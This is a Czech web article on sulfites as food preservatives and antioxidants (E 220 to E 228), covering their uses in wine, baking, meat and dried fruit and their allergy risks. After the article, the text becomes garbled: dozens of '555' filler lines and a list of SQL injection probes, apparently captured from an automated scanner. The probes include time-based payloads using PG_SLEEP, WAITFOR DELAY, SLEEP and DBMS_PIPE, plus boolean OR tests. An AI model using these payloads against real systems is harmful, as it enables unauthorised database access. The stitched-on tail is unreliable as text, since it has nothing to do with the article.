Siřičitany působí jako konzervanty a antioxidanty. Používají se například při výrobě vína, pekařských produktů, masa a masných výrobků, ale také u čerstvého i sušeného ovoce a zeleniny.
Siřičitany jako konzervační látky velmi účinně působí proti různým mikroorganismům, bakteriím, kvasinkám i plísním. Mají i značné antioxidační vlastnosti a u mnoha druhů potravin zabraňují postupným změnám barvy.
Používají se při přepravě vinných hroznů, kdy zabraňují vzniku plísní a také při samotné výrobě vína. V pekařském průmyslu se využívají pro úpravu kvality těsta, u masa a masných výrobků brání vzniku a rozmnožování různých škodlivých mikroorganismů. Vzhledem k antioxidačním vlastnostem a schopnosti zabraňovat změnám barvy se používají na různé čerstvé ovoce a zeleninu. U sušeného ovoce siřičitany jeho barvu ještě vylepšují - např. sušené meruňky bez jejich použití jsou hnědé, s použitím siřičitanů přitažlivě oranžové. Nepoužívají se při sušení rozinek a švestek, kde je žádoucí tmavá barva, a také při sušení cibule a česneku. Poměrně velké uplatnění mají při výrobě různých produktů z brambor, hub a ořechů, a také při bělení chmele. Využívají se také pro dekontaminaci potravinářských výrobních zařízení.
Siřičitany jsou zařazeny ve skupině přídatných látek s označení E 220 až E 228. Do této skupiny patří oxid siřičitý a anorganické soli, které mohou uvolňovat pro lidský organismus nepříznivý oxid siřičitý
Siřičitany jsou na lidské zdraví nepříznivě působící látky, které mohou vyvolat alergické reakce a jsou zcela nevhodné pro děti a alergiky.
- E 220 - Oxid siřičitý
- E 221 - Siřičitan sodný
- E 222 - Hydrogensiřičitan sodný
- E 223 - Disiřičitan sodný
- E 224 - Disiřičitan draselný
- E 226 - Siřičitan vápenatý
- E 227 - Hydrogensiřičitan vápenatý
- E 228 - Hydrogensiřičitan draselný
Přidávání siřičitanů do potravin a nápojů je upraveno přísnými předpisy. Látky, které mohou způsobit zdravotní problémy jsou v potravinách v množství, které by při běžné konzumaci nemělo vyvolat žádné zdravotní problémy. Ty ale nelze zcela vyloučit například u osob se zvýšenou citlivostí na chemické přísady v potravinách a při konzumaci většího množství takových potravin u dětí. Proto je vždy dobré si přečíst složení výrobku a v případě, že takové želírovací prostředky obsahuje jeho konzumaci maximálně omezit nebo se jí zcela vyhnout.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@DTmpn
1%2527%2522
1'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
R2DptbE3')) OR 457=(SELECT 457 FROM PG_SLEEP(15))--
jBeUidCO') OR 106=(SELECT 106 FROM PG_SLEEP(15))--
FVUTLQEJ' OR 91=(SELECT 91 FROM PG_SLEEP(15))--
-1)) OR 50=(SELECT 50 FROM PG_SLEEP(15))--
-5) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
-5 OR 585=(SELECT 585 FROM PG_SLEEP(15))--
BQells6Z'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+853-853) --
-1" OR 3*2<(0+5+853-853) --
-1" OR 3+853-853-1=0+0+0+1 --
-1" OR 2+853-853-1=0+0+0+1 --
-1' OR 3*2>(0+5+536-536) or 'yGhKaUWd'='
-1' OR 3*2<(0+5+536-536) or 'yGhKaUWd'='
-1' OR 3+536-536-1=0+0+0+1 or 'yGhKaUWd'='
-1' OR 2+536-536-1=0+0+0+1 or 'yGhKaUWd'='
-1' OR 3*2>(0+5+874-874) --
-1' OR 3*2<(0+5+874-874) --
-1' OR 3+874-874-1=0+0+0+1 --
-1' OR 2+874-874-1=0+0+0+1 --
-1 OR 3*2>(0+5+849-849)
-1 OR 3*2<(0+5+849-849)
-1 OR 3+849-849-1=0+0+0+1
-1 OR 2+849-849-1=0+0+0+1
-1 OR 3*2>(0+5+44-44) --
-1 OR 3*2<(0+5+44-44) --
-1 OR 3+44-44-1=0+0+0+1 --
-1 OR 2+44-44-1=0+0+0+1 --
555
555
555
555
555